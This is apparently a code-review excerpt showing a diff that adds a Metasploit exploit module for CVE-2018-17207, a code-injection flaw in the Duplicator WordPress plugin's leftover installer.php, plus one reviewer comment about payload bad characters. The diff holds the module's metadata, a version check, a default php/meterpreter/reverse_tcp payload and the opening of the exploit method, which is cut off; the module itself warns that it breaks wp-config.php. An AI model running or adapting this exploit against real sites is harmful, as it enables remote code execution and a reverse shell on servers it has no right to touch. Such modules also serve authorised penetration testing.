modules/exploits/multi/php/wordpress_duplicator.rb

```diff
@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Snapcreek Duplicator WordPress plugin installer.php code injection',
+      'Description'     => %q{
+        When the WordPress plugin Duplicator restores a backup, it leaves dangerous files in the filesystem such as
+        installer.php and installer-backup.php. These files allow anyone to call a function that overwrite the wp-config.php file
+        AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to
+        arbitrary PHP code execution.
+        WARNING: This exploit WILL break the wp-config.php file. If possible try to restore backups of the configuration after the exploit
+        to make the WordPress site work again.
+      },
+      'Author'          => [ 'Julien Legras <julien.legras@synacktiv.com>', 'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>' ],
+      'References'     => [
+        ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
+        ['WPVDB', '9123'],
+        ['CVE', '2018-17207']
+      ],
+      'License'         => MSF_LICENSE,
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Aug 29 2018',
+      'DefaultOptions'  =>
+      {
+        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+      },
+
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress Duplicator <= 1.2.40', {}]],
+      'DefaultTarget'   => 0))
+
+    register_options([
+      OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
+      ])
+  end
+
+  def check
+    tpath = normalize_uri(datastore['TARGETURI'])
+
+    print_status("Checking uri #{rhost+tpath}")
+    response = send_request_raw({ 'uri' => tpath})
+    version = response.body.to_s.scan( /version: ([^<]*)</).last.first
+    return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
+    vprint_error("Server responded with #{response.code}")
+    return Exploit::CheckCode::Safe
+
+  end
+
+  def exploit
+    payload_oneline = payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
```

Comment:
You can specify bad characters in the payload options, which would alleviate needing to do it here.  See https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/wikka_spam_exec.rb#L38